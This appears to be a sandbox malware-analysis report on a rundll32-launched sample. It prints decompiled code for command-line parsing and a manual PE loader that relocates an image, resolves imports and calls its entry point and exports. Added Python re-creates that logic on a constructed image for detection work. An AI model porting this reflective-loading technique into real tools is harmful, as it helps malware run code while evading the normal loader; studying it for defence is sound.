            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: memset$ErrorLast
            • String ID: POST
            • API String ID: 2570506013-1814004025
            • Opcode ID: 1be270d4c8620b07ac5a59ba16f0081fb9168203f77e8c118903e41858250abf
            • Instruction ID: 824dacaabcaa70442fcb465af4986cd100999377ac1c21d8cf83b4ae045e1b61
            • Opcode Fuzzy Hash: 1be270d4c8620b07ac5a59ba16f0081fb9168203f77e8c118903e41858250abf
            • Instruction Fuzzy Hash: F1A17175A00319AFDB10EFA5D888AAEB7F8FF08310F15406AE415EF250DB749A49CF95
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: _snprintfqsort
            • String ID: %I64d$false$null$true
            • API String ID: 756996078-4285102228
            • Opcode ID: 5bdd2b752d0f0d10c129e41f4f7a5ccfc25f21ac1d565ea3698d8632a8185a02
            • Instruction ID: a9efb062724684d14c025236e95c757a6ef86cd8ec50a17d415b8febc117d378
            • Opcode Fuzzy Hash: 5bdd2b752d0f0d10c129e41f4f7a5ccfc25f21ac1d565ea3698d8632a8185a02
            • Instruction Fuzzy Hash: 23E17CB190020ABFDF15EE65CC81EEF3B69EF05784F14445AFD169E240E731DA618BA8
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 83%
            			E0346503F(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, WCHAR* _a12) {
            				void _v532;
            				char _v548;
            				char _v580;
            				char _v584;
            				short _v588;
            				WCHAR* _v592;
            				WCHAR* _v596;
            				intOrPtr _v600;
            				char _v628;
            				char _v632;
            				void* __ebx;
            				void* __esi;
            				short _t47;
            				WCHAR* _t54;
            				WCHAR* _t55;
            				intOrPtr _t56;
            				signed int _t61;
            				void* _t65;
            				void* _t66;
            				WCHAR* _t67;
            				intOrPtr _t68;
            				WCHAR* _t70;
            				intOrPtr _t71;
            				WCHAR* _t73;
            				WCHAR* _t83;
            				intOrPtr _t84;
            				void* _t85;
            				intOrPtr _t86;
            				void* _t93;
            				intOrPtr _t94;
            				intOrPtr _t96;
            				void* _t99;
            				void* _t100;
            				WCHAR* _t101;
            				void* _t112;
            				WCHAR* _t116;
            				intOrPtr _t127;
            				void* _t128;
            				void* _t146;
            				WCHAR* _t149;
            				void* _t150;
            				void* _t152;
            				void* _t156;
            				WCHAR* _t157;
            				WCHAR* _t159;
            				signed int _t160;
            				signed int _t161;
            				intOrPtr* _t163;
            				signed int _t165;
            				void* _t168;
            				void* _t169;
            				intOrPtr* _t170;
            				void* _t175;
            
            				_t175 = __fp0;
            				_push(_t160);
            				_t99 = __edx;
            				_t156 = __ecx;
            				_t161 = _t160 | 0xffffffff;
            				memset( &_v532, 0, 0x20c);
            				_t168 = (_t165 & 0xfffffff8) - 0x254 + 0xc;
            				_v592 = 1;
            				if(_t156 != 0) {
            					_t94 =  *0x347f8d4; // 0x50ffc00
            					_t3 = _t94 + 0x110; // 0x51016d0
            					_t96 =  *0x347f8d8; // 0x50ffab0
            					_v600 =  *((intOrPtr*)(_t96 + 0x68))(_t156,  *((intOrPtr*)( *_t3)));
            				}
            				if(E0346CB85(_t156) != 0) {
            					L4:
            					_t47 = E0346C85A();
            					_push(_t99);
            					_v588 = _t47;
            					E0346C64D(_t47,  &_v580, _t173, _t175);
            					_t100 = E03464FFB( &_v580,  &_v580, _t173);
            					_t112 = E0346E34A( &_v580, E0346A5D0( &_v580), 0);
            					E0346C870(_t112,  &_v548, _t175);
            					_push(_t112);
            					_t54 = E03463174(_t156,  &_v580, _t173, _t175);
            					_v596 = _t54;
            					if(_t54 != 0) {
            						_push(0);
            						_push(_t100);
            						_push(0x347c9d8);
            						_t55 = E03469C50(_t54);
            						_t169 = _t168 + 0x10;
            						_t101 = _t55;
            						__eflags = _v592;
            						if(__eflags != 0) {
            							_t56 = E03469AB3(_v596);
            							_t116 = _t101;
            							 *0x347f990 = _t56;
            							 *0x347f988 = E03469AB3(_t116);
            							L12:
            							_push(_t116);
            							_t157 = E0346A7C6( &_v532, _t156, _t175, _v588,  &_v584,  &_v596);
            							_t170 = _t169 + 0x10;
            							__eflags = _t157;
            							if(_t157 == 0) {
            								goto L36;
            							}
            							_push(0x347ca26);
            							_t146 = 0xe;
            							E0346AC36(_t146, _t175);
            							E0346AC6F(_t157, _t175, _t101);
            							_t163 = _a4;
            							_push( *_t163);
            							E0346AC11(0xb);
            							_t148 =  *(_t163 + 0x10);
            							__eflags =  *(_t163 + 0x10);
            							if( *(_t163 + 0x10) != 0) {
            								E0346B1B1(_t148, _t175);
            							}
            							_t149 =  *(_t163 + 0xc);
            							__eflags = _t149;
            							if(_t149 != 0) {
            								E0346B1B1(_t149, _t175);
            							}
            							_t65 = E0346A1F8(0);
            							_push(_t149);
            							_t150 = 2;
            							_t66 = E0346ABE3();
            							__eflags = _v592;
            							_t127 = _t65;
            							if(_v592 == 0) {
            								_t127 =  *0x347f8d4; // 0x50ffc00
            								__eflags =  *((intOrPtr*)(_t127 + 0xa4)) - 1;
            								if(__eflags != 0) {
            									_t67 = E03470DDF(_t66, _t101, _t150, _t175, 0, _t101, 0);
            									_t170 = _t170 + 0xc;
            									goto L21;
            								}
            								_t127 = _t127 + 0x228;
            								goto L20;
            							} else {
            								_t68 =  *0x347f8d4; // 0x50ffc00
            								__eflags =  *((intOrPtr*)(_t68 + 0xa4)) - 1;
            								if(__eflags != 0) {
            									L27:
            									__eflags =  *(_t68 + 0x1898) & 0x00000082;
            									if(( *(_t68 + 0x1898) & 0x00000082) != 0) {
            										_t152 = 0x64;
            										E0346F15B(_t152);
            									}
            									E0346565D( &_v580, _t175);
            									_t159 = _a8;
            									_t128 = _t127;
            									__eflags = _t159;
            									if(_t159 != 0) {
            										_t71 =  *0x347f8d4; // 0x50ffc00
            										__eflags =  *((intOrPtr*)(_t71 + 0xa0)) - 1;
            										if( *((intOrPtr*)(_t71 + 0xa0)) != 1) {
            											lstrcpyW(_t159, _t101);
            										} else {
            											_t73 = E0346109A(_t128, 0x153);
            											_v596 = _t73;
            											lstrcpyW(_t159, _t73);
            											E03468D9A( &_v596);
            											 *_t170 = "\"";
            											lstrcatW(_t159, ??);
            											lstrcatW(_t159, _t101);
            											lstrcatW(_t159, "\"");
            										}
            									}
            									_t70 = _a12;
            									__eflags = _t70;
            									if(_t70 != 0) {
            										 *_t70 = _v588;
            									}
            									_t161 = 0;
            									__eflags = 0;
            									goto L36;
            								}
            								_t32 = _t68 + 0x228; // 0x50ffe28
            								_t127 = _t32;
            								L20:
            								_t67 = E034658D2(_t127, _t101, __eflags);
            								L21:
            								__eflags = _t67;
            								if(_t67 >= 0) {
            									_t68 =  *0x347f8d4; // 0x50ffc00
            									goto L27;
            								}
            								_push(0xfffffffd);
            								L6:
            								_pop(_t161);
            								goto L36;
            							}
            						}
            						_t83 = E0346D210(_v588, __eflags);
            						_v596 = _t83;
            						_t84 =  *0x347f8d0; // 0x50ff8c0
            						_t85 =  *((intOrPtr*)(_t84 + 0xdc))(_t83, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
            						__eflags = _t85 - _t161;
            						if(_t85 != _t161) {
            							_t86 =  *0x347f8d0; // 0x50ff8c0
            							 *((intOrPtr*)(_t86 + 0x30))();
            							E03468DDF( &_v632, _t161);
            							_t116 = _t85;
            							goto L12;
            						}
            						E03468DDF( &_v628, _t161);
            						_t61 = 1;
            						goto L37;
            					}
            					_push(0xfffffffe);
            					goto L6;
            				} else {
            					_t93 = E0346308A( &_v532, _t161, 0x105);
            					_t173 = _t93;
            					if(_t93 == 0) {
            						L36:
            						_t61 = _t161;
            						L37:
            						return _t61;
            					}
            					goto L4;
            				}
            			}

            APIs
            • memset.MSVCRT ref: 03465061
            • lstrcpyW.KERNEL32 ref: 034652C7
            • lstrcatW.KERNEL32(00000000,?), ref: 034652E5
            • lstrcatW.KERNEL32(00000000,00000000), ref: 034652E9
            • lstrcatW.KERNEL32(00000000,0347CA28), ref: 034652F1
              • Part of subcall function 03468DDF: HeapFree.KERNEL32(00000000,00000000), ref: 03468E25
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: lstrcat$FreeHeaplstrcpymemset
            • String ID:
            • API String ID: 911671052-0
            • Opcode ID: a537a0d6a702bfd09184bb82c09847487e0813bffe8e16bdd93ef245a75c90b4
            • Instruction ID: 18c7f67a9268ed46fccec91ea3f56cbf79d0b5408989dd74f3310475ee60bbba
            • Opcode Fuzzy Hash: a537a0d6a702bfd09184bb82c09847487e0813bffe8e16bdd93ef245a75c90b4
            • Instruction Fuzzy Hash: 1671DF75604301AFD714EF25D884BBB73E9EBC5610F18056FE456AF280EB7098488B9B
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 93%
            			E0346DEAB(WCHAR* __ecx) {
            				int _v8;
            				WCHAR* _v12;
            				WCHAR* _v16;
            				WCHAR* _v140;
            				WCHAR* _v144;
            				short _v664;
            				signed int _t28;
            				signed int _t29;
            				signed int _t30;
            				WCHAR* _t36;
            				int _t40;
            				signed int _t41;
            				int _t44;
            				signed int _t45;
            				WCHAR* _t49;
            				signed int _t51;
            				WCHAR* _t52;
            				void* _t53;
            
            				_v8 = _v8 & 0x00000000;
            				_v16 = __ecx;
            				_t51 = 0;
            				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
            				_t44 = _v8;
            				_t41 = 0;
            				_v12 = _t28;
            				if(_t44 <= 0) {
            					L22:
            					_t29 = _t28 | 0xffffffff;
            					__eflags = _t29;
            					return _t29;
            				} else {
            					goto L1;
            				}
            				do {
            					L1:
            					_t49 =  *(_t28 + _t41 * 4);
            					_t30 =  *_t49 & 0x0000ffff;
            					if(_t30 != 0 && _t30 != 0xd && _t30 != 0xa && _t30 != 0x2d && _t30 != 0x2f && _t51 < 0x20) {
            						 *(_t53 + _t51 * 4 - 0x8c) = _t49;
            						_t40 = lstrlenW(_t49);
            						_t45 = 0;
            						if(_t40 <= 0) {
            							L11:
            							_t44 = _v8;
            							_t51 = _t51 + 1;
            							goto L12;
            						} else {
            							goto L8;
            						}
            						do {
            							L8:
            							if(_t49[_t45] == 0x2c) {
            								_t49[_t45] = 0;
            							}
            							_t45 = _t45 + 1;
            						} while (_t45 < _t40);
            						goto L11;
            					}
            					L12:
            					_t28 = _v12;
            					_t41 = _t41 + 1;
            				} while (_t41 < _t44);
            				if(_t51 != 1) {
            					if(__eflags <= 0) {
            						goto L22;
            					}
            					_t52 = _v140;
            					L17:
            					if( *_t52 == 0x5c || _t52[1] == 0x3a) {
            						lstrcpynW(_v16, _t52, 0x104);
            					} else {
            						GetCurrentDirectoryW(0x104,  &_v664);
            						_push(0);
            						_push(_t52);
            						_push(0x347c9d8);
            						_t36 = E03469C50( &_v664);
            						_v12 = _t36;
            						lstrcpynW(_v16, _t36, 0x104);
            						E03468DDF( &_v12, 0xfffffffe);
            					}
            					return 0;
            				}
            				_t52 = _v144;
            				goto L17;
            			}
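E0346DEAB reads the host process's command line through GetCommandLineW/CommandLineToArgvW, drops every argument that is empty or starts with CR, LF, '-' or '/', keeps at most 0x20 of the rest, turns every ',' in a kept argument into NUL (so "pebbles.dat.dll,DllRegisterServer" becomes "pebbles.dat.dll", the rundll32 DLL,export form), and copies the chosen argument into the caller's 0x104-WCHAR buffer with lstrcpynW, prepending the current directory unless the argument starts with '\' or has ':' as its second character; with no usable argument it returns -1. The Python below is an added example written for this report, not the sample's or Joe Sandbox's code: it reproduces that selection so a command line seen in telemetry can be mapped to the path the DLL would treat as its own. Two points are my reading rather than something the decompilation states outright: the stack layout (the first stored pointer is used when exactly one argument survives, the second when more do, which matches argv[0] being rundll32.exe or regsvr32.exe), and the format string at 0x347c9d8, assumed here to join the directory and the argument with a backslash. The sample command lines in the test are constructed.

```python
MAX_KEPT = 0x20                           # the sample stores at most 0x20 argument pointers
SKIP_FIRST = {"\r", "\n", "-", "/"}       # 0x0D, 0x0A, 0x2D, 0x2F; an empty argument is skipped too

def resolve_module_path(argv, cwd, max_path=0x104):
    """Path E0346DEAB would copy into its caller's buffer, or None where it returns -1.
    argv is the CommandLineToArgvW output; cwd stands in for GetCurrentDirectoryW."""
    kept = []
    for arg in argv:
        if not arg or arg[0] in SKIP_FIRST or len(kept) >= MAX_KEPT:
            continue
        # the lstrlenW loop overwrites every ',' with NUL, so the C string now ends at
        # the first comma: "pebbles.dat.dll,DllRegisterServer" -> "pebbles.dat.dll"
        kept.append(arg.split(",", 1)[0])
    if not kept:
        return None
    # my reading of the stack layout: one surviving argument -> use it, more than one ->
    # use the second (argv[0] is the host, e.g. rundll32.exe or regsvr32.exe)
    chosen = kept[0] if len(kept) == 1 else kept[1]
    if not (chosen.startswith("\\") or chosen[1:2] == ":"):
        # assumed form of the 0x347c9d8 format string: directory + backslash + argument
        chosen = cwd.rstrip("\\") + "\\" + chosen
    return chosen[:max_path - 1]          # lstrcpynW(dst, src, 0x104) keeps 0x103 WCHARs
```

Feed it the argv a sensor recorded for a rundll32 or regsvr32 launch and it returns the path the loader derives; a command line made only of switches, or an empty one, maps to None, the -1 path in the decompilation.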

            APIs
            • GetCommandLineW.KERNEL32 ref: 0346DEC0
            • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 0346DECB
            • lstrlenW.KERNEL32 ref: 0346DF0D
            • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0346DF66
            • lstrcpynW.KERNEL32(?,00000000,00000104), ref: 0346DF8B
            • lstrcpynW.KERNEL32(?,?,00000104), ref: 0346DFA9
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: CommandLinelstrcpyn$ArgvCurrentDirectorylstrlen
            • String ID:
            • API String ID: 1259063344-0
            • Opcode ID: 66d28fd56df91314349d47ac33c766b92f88ab131f34abf365a0724a1775ff34
            • Instruction ID: 98211862f8833ed314bbd54574e737c7bef4f4c5183d98789da976b032970c2d
            • Opcode Fuzzy Hash: 66d28fd56df91314349d47ac33c766b92f88ab131f34abf365a0724a1775ff34
            • Instruction Fuzzy Hash: 3431C471E10115AFDF28EF99D898AAEB7BCEF46310F14409BE411EF250DB7099818B96
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SysAllocString.OLEAUT32(00000000), ref: 0346E6ED
            • SysAllocString.OLEAUT32(?), ref: 0346E6F5
            • SysAllocString.OLEAUT32(00000000), ref: 0346E709
            • SysFreeString.OLEAUT32(?), ref: 0346E784
            • SysFreeString.OLEAUT32(?), ref: 0346E787
            • SysFreeString.OLEAUT32(?), ref: 0346E78C
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: String$AllocFree
            • String ID:
            • API String ID: 344208780-0
            • Opcode ID: ef5a5bbe08da708db0e8e26c3895cb173462214e6def6b7eb5316e6025bb97a2
            • Instruction ID: 9a45d5a96507cf087186ddf643f0caff1f4a0eb951ee11c3e4398c577cb6e68b
            • Opcode Fuzzy Hash: ef5a5bbe08da708db0e8e26c3895cb173462214e6def6b7eb5316e6025bb97a2
            • Instruction Fuzzy Hash: AE211975A00218BFDB00DFA5CD88DAFBBBDEF88254B20449AE505EB250D770AE01CB60
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 20%
            			E03473DC7(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr _a20) {
            				signed int _v5;
            				signed short _v12;
            				intOrPtr* _v16;
            				intOrPtr _v20;
            				signed int* _v24;
            				unsigned int _v28;
            				signed short* _v32;
            				struct HINSTANCE__* _v36;
            				signed int _v40;
            				signed int _v44;
            				intOrPtr* _v48;
            				signed short* _v52;
            				intOrPtr _v56;
            				unsigned int _v60;
            				intOrPtr _v64;
            				_Unknown_base(*)()* _v68;
            				signed int _v72;
            				intOrPtr _v76;
            				intOrPtr _v80;
            				intOrPtr _v84;
            				unsigned int _v88;
            				intOrPtr _v92;
            				signed int _v96;
            				intOrPtr _v100;
            				intOrPtr _v104;
            				intOrPtr _v108;
            				intOrPtr _v112;
            				CHAR* _v116;
            				signed int _v120;
            				intOrPtr _v124;
            				signed int _v128;
            				signed int _v132;
            				signed int _t216;
            				signed int _t233;
            				void* _t273;
            				signed int _t278;
            				signed int _t280;
            				intOrPtr _t320;
            
            				_v44 = _v44 & 0x00000000;
            				_v84 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
            				_v20 = _v84;
            				_t320 = _a4 -  *((intOrPtr*)(_v20 + 0x34));
            				_v64 = _t320;
            				if(_t320 == 0) {
            					L13:
            					while(0 != 0) {
            					}
            					_push(8);
            					if( *((intOrPtr*)(_v20 + 0xbadc25)) == 0) {
            						L35:
            						if(_a16 == 0) {
            							L54:
            							_v80 =  *((intOrPtr*)(_v20 + 0x28)) + _a4;
            							while(0 != 0) {
            							}
            							if(_a12 != 0) {
            								 *_a12 = _v80;
            							}
            							 *((intOrPtr*)(_v20 + 0x34)) = _a4;
            							_v124 = _v80(_a4, 1, _a8);
            							while(0 != 0) {
            							}
            							if(_v124 != 0) {
            								if(_v44 == 0) {
            									L77:
            									return 1;
            								}
            								if(_a20 != 1) {
            									if(_a20 != 2) {
            										L75:
            										while(0 != 0) {
            										}
            										goto L77;
            									}
            									while(0 != 0) {
            									}
            									_v132 = _v44;
            									goto L75;
            								}
            								while(0 != 0) {
            								}
            								_v44();
            								goto L75;
            							}
            							while(0 != 0) {
            							}
            							return 0;
            						}
            						while(0 != 0) {
            						}
            						_push(8);
            						if( *((intOrPtr*)(_v20 + 0x78)) == 0) {
            							goto L54;
            						}
            						_v128 = 0x80000000;
            						_t216 = 8;
            						_v76 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t216 * 0));
            						_v108 = _a4 +  *((intOrPtr*)(_v76 + 0x20));
            						_v112 = _a4 +  *((intOrPtr*)(_v76 + 0x1c));
            						_v104 =  *((intOrPtr*)(_v76 + 0x18));
            						while(0 != 0) {
            						}
            						_v40 = _v40 & 0x00000000;
            						while(_v40 < _v104) {
            							_v116 = _a4 +  *((intOrPtr*)(_v108 + _v40 * 4));
            							_v120 = _a4 +  *((intOrPtr*)(_v112 + _v40 * 4));
            							if(lstrcmpA(_v116, _a16) != 0) {
            								_v40 = _v40 + 1;
            								continue;
            							}
            							while(0 != 0) {
            							}
            							_v44 = _v120;
            							break;
            						}
            						if(_v44 != 0) {
            							goto L54;
            						}
            						while(0 != 0) {
            						}
            						return 0xffffffff;
            					}
            					_v96 = 0x80000000;
            					_t233 = 8;
            					_v16 = _a4 +  *((intOrPtr*)(_v20 + (_t233 << 0) + 0x78));
            					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
            						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
            						if(_v36 == 0) {
            							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
            						}
            						if(_v36 != 0) {
            							if( *_v16 == 0) {
            								_v24 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
            							} else {
            								_v24 =  *_v16 + _a4;
            							}
            							_v72 = _v72 & 0x00000000;
            							while( *_v24 != 0) {
            								if(( *_v24 & _v96) == 0) {
            									_v100 =  *_v24 + _a4;
            									_v68 = GetProcAddress(_v36, _v100 + 2);
            								} else {
            									_v68 = GetProcAddress(_v36,  *_v24 & 0x0000ffff);
            								}
            								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
            									 *_v24 = _v68;
            								} else {
            									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v72) = _v68;
            								}
            								_v24 =  &(_v24[1]);
            								_v72 = _v72 + 4;
            							}
            							_v16 = _v16 + 0x14;
            							continue;
            						} else {
            							_t273 = 0xfffffffd;
            							return _t273;
            						}
            					}
            					goto L35;
            				}
            				_t278 = 8;
            				_v52 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t278 * 5));
            				_t280 = 8;
            				_v56 =  *((intOrPtr*)(_v20 + 0x7c + _t280 * 5));
            				while(0 != 0) {
            				}
            				while(_v56 > 0) {
            					_v28 = _v52[2];
            					_v56 = _v56 - _v28;
            					_v28 = _v28 - 8;
            					_v28 = _v28 >> 1;
            					_v32 =  &(_v52[4]);
            					_v92 = _a4 +  *_v52;
            					_v60 = _v28;
            					while(1) {
            						_v88 = _v60;
            						_v60 = _v60 - 1;
            						if(_v88 == 0) {
            							break;
            						}
            						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
            						_v12 =  *_v32 & 0xfff;
            						_v48 = (_v12 & 0x0000ffff) + _v92;
            						if((_v5 & 0x000000ff) != 3) {
            							if((_v5 & 0x000000ff) == 0xa) {
            								 *_v48 =  *_v48 + _v64;
            							}
            						} else {
            							 *_v48 =  *_v48 + _v64;
            						}
            						_v32 =  &(_v32[1]);
            					}
            					_v52 = _v32;
            				}
            				goto L13;
            			}
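E03473DC7 is a manual PE loader. It applies base relocations when the image is not at its preferred base (types 3 and 0xA, adding a 32-bit delta in both cases), resolves imports through GetModuleHandleA/LoadLibraryA and GetProcAddress (by ordinal when bit 31 of the thunk is set, otherwise by the hint/name string at thunk + 2, writing into FirstThunk or in place when FirstThunk is 0), optionally looks an export up by name with lstrcmpA, stores the load address into OptionalHeader.ImageBase, calls the entry point as DllMain(base, 1, arg) and then either calls the named export (_a20 == 1) or stores its address (_a20 == 2). Two details matter for anyone re-implementing or detecting it: a failed LoadLibraryA returns -3 while a NULL from GetProcAddress goes into the IAT unchecked, and the export lookup indexes AddressOfFunctions with the position found in AddressOfNames without consulting AddressOfNameOrdinals, which is only correct when that table is the identity. The Python below is an added example written for this report, not code from the sample or from Joe Sandbox; it re-implements those passes with the same header offsets over a constructed PE32 image built inline (build_image), with a stand-in resolver (fake_get_proc, a hypothetical name and table) in place of the real Win32 calls.

```python
import struct

IMAGE_REL_BASED_HIGHLOW, IMAGE_REL_BASED_DIR64 = 3, 0xA      # winnt.h relocation types
IMAGE_ORDINAL_FLAG32, DLL_PROCESS_ATTACH = 0x80000000, 1

def u32(image, off):
    return struct.unpack_from("<I", image, off)[0]
def data_directory(image, index):
    # NT+0x78 is the base the sample uses: 0x78 export, 0x80 import, 0xA0 base reloc
    return struct.unpack_from("<II", image, u32(image, 0x3C) + 0x78 + 8 * index)
def cstr(image, off):
    return bytes(image[off:image.index(b"\0", off)]).decode("ascii")

def apply_relocations(image, delta):
    """Add delta to every HIGHLOW/DIR64 slot the way E03473DC7 walks its blocks:
    entries = (SizeOfBlock-8)/2, type = entry>>12, offset = entry&0xFFF."""
    rva, remaining = data_directory(image, 5)
    patched = 0
    while remaining > 0:
        page_rva, block_size = struct.unpack_from("<II", image, rva)
        for i in range((block_size - 8) // 2):
            entry = struct.unpack_from("<H", image, rva + 8 + 2 * i)[0]
            typ, target = entry >> 12, page_rva + (entry & 0xFFF)
            if typ == IMAGE_REL_BASED_HIGHLOW:
                fmt, mask = "<I", 0xFFFFFFFF
            elif typ == IMAGE_REL_BASED_DIR64:   # the sample adds a 32-bit delta here too
                fmt, mask = "<Q", 0xFFFFFFFFFFFFFFFF
            else:
                continue                        # IMAGE_REL_BASED_ABSOLUTE padding
            val = struct.unpack_from(fmt, image, target)[0]
            struct.pack_into(fmt, image, target, (val + delta) & mask)
            patched += 1
        rva, remaining = rva + block_size, remaining - block_size
    return patched

def resolve_imports(image, get_proc):
    """Walk IMAGE_IMPORT_DESCRIPTORs (0x14 bytes, list ends at Name == 0) and fill
    FirstThunk; get_proc(dll, name_or_ordinal) returning None = DLL failed to load."""
    desc, resolved = data_directory(image, 1)[0], []
    while u32(image, desc + 0xC) != 0:
        oft, _, _, name_rva, ft = struct.unpack_from("<IIIII", image, desc)
        dll, lookup = cstr(image, name_rva), oft or ft   # sample falls back to FirstThunk
        i = 0
        while u32(image, lookup + 4 * i) != 0:
            thunk = u32(image, lookup + 4 * i)
            sym = thunk & 0xFFFF if thunk & IMAGE_ORDINAL_FLAG32 else cstr(image, thunk + 2)
            addr = get_proc(dll, sym)
            if addr is None:
                return None                     # the sample returns -3 (0xFFFFFFFD)
            struct.pack_into("<I", image, (ft or lookup) + 4 * i, addr)
            resolved.append((dll, sym, addr))
            i += 1
        desc += 0x14
    return resolved

def find_export(image, name, use_ordinal_table=True):
    """RVA of export `name`; use_ordinal_table=False reproduces the sample, which
    indexes AddressOfFunctions by position in AddressOfNames and skips the ordinal table."""
    exp = data_directory(image, 0)[0]
    n_names, funcs, names, ords = struct.unpack_from("<IIII", image, exp + 0x18)
    for i in range(n_names):
        if cstr(image, u32(image, names + 4 * i)) == name:
            idx = struct.unpack_from("<H", image, ords + 2 * i)[0] if use_ordinal_table else i
            return u32(image, funcs + 4 * idx)
    return None

def load_image(image, new_base, get_proc):
    """Relocate, resolve imports, store new_base in ImageBase (NT+0x34) as the sample does."""
    nt = u32(image, 0x3C)
    delta = new_base - u32(image, nt + 0x34)
    patched = apply_relocations(image, delta) if delta else 0   # sample skips delta == 0
    imports = resolve_imports(image, get_proc)
    if imports is None:
        return None
    struct.pack_into("<I", image, nt + 0x34, new_base)
    return {"patched": patched, "imports": imports,             # DllMain(base, 1, lpReserved)
            "dllmain": (new_base, DLL_PROCESS_ATTACH, u32(image, nt + 0x28))}

def build_image():
    """Constructed PE32 image (not the sample): ImageBase 0x10000000, entry 0x300."""
    img = bytearray(0x600)
    img[0:2], img[0x80:0x84] = b"MZ", b"PE\0\0"
    struct.pack_into("<I", img, 0x3C, 0x80)                                # e_lfanew
    struct.pack_into("<H14xI8xI", img, 0x98, 0x10B, 0x300, 0x10000000)     # magic, entry, base
    struct.pack_into("<IIII24xII", img, 0xF8, 0x200, 0x40, 0x400, 0x28, 0x500, 0xC)  # dirs 0, 1, 5
    # export dir: 2 names; AddressOfFunctions, AddressOfNames, AddressOfNameOrdinals (not identity)
    struct.pack_into("<IIII24xII8xII8xHH", img, 0x218, 2, 0x240, 0x250, 0x260,
                     0x310, 0x300, 0x270, 0x280, 1, 0)
    img[0x270:0x276], img[0x280:0x285] = b"Alpha\0", b"Beta\0"
    struct.pack_into("<IIIII", img, 0x400, 0x440, 0, 0, 0x480, 0x460)      # OFT, .., Name, FT
    struct.pack_into("<III", img, 0x440, 0x4A0, IMAGE_ORDINAL_FLAG32 | 7, 0)
    img[0x460:0x46C], img[0x480:0x48D] = img[0x440:0x44C], b"KERNEL32.dll\0"
    img[0x4A0:0x4AF] = b"\0\0LoadLibraryA\0"                               # hint + name
    struct.pack_into("<I", img, 0x300, 0x10000310)                         # absolute pointer to fix
    struct.pack_into("<IIHH", img, 0x500, 0x300, 12, IMAGE_REL_BASED_HIGHLOW << 12, 0)
    return img

def fake_get_proc(dll, sym):
    # stand-in resolver: unknown DLL -> None, unknown symbol -> 0 (the sample writes it unchecked)
    table = {("KERNEL32.dll", "LoadLibraryA"): 0x77E01234, ("KERNEL32.dll", 7): 0x77E05678}
    return table.get((dll, sym), 0) if dll == "KERNEL32.dll" else None
```

Loading the constructed image at 0x10400000 patches the one HIGHLOW slot, fills both IAT entries and reports the DllMain call the sample would make; find_export("Beta") with and without the ordinal table returns different RVAs, which is the mismatch the sample's lookup would hit on a real export table whose name order differs from its function order.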

            APIs
            • GetModuleHandleA.KERNEL32(00000000), ref: 03473F2E
            • LoadLibraryA.KERNEL32(00000000), ref: 03473F47
            • GetProcAddress.KERNEL32(00000000,?), ref: 03473FA3
            • GetProcAddress.KERNEL32(00000000,?), ref: 03473FC2
            • lstrcmpA.KERNEL32(?,00000000), ref: 034740B3
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: AddressProc$HandleLibraryLoadModulelstrcmp
            • String ID:
            • API String ID: 1872726118-0
            • Opcode ID: bd2e903e1508fac69e961ab0d7b5bc41baf6ae9dd9875eb9dc25cc9b5561e197
            • Instruction ID: ed971c0d092f8db93b33893a71defd94b8ef0605079ffa730b70fa91e479d26c
            • Opcode Fuzzy Hash: bd2e903e1508fac69e961ab0d7b5bc41baf6ae9dd9875eb9dc25cc9b5561e197
            • Instruction Fuzzy Hash: A0E19F74A10249DFCB14CFA9C884AEEBBF1FF08354F14855AE825AB351D734A985CF98
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID: @$\u%04X$\u%04X\u%04X
            • API String ID: 0-2132903582
            • Opcode ID: 353f941563edf6a18604ee3d1b63578f9296c99f674609c9cda5fcce4f5449f2
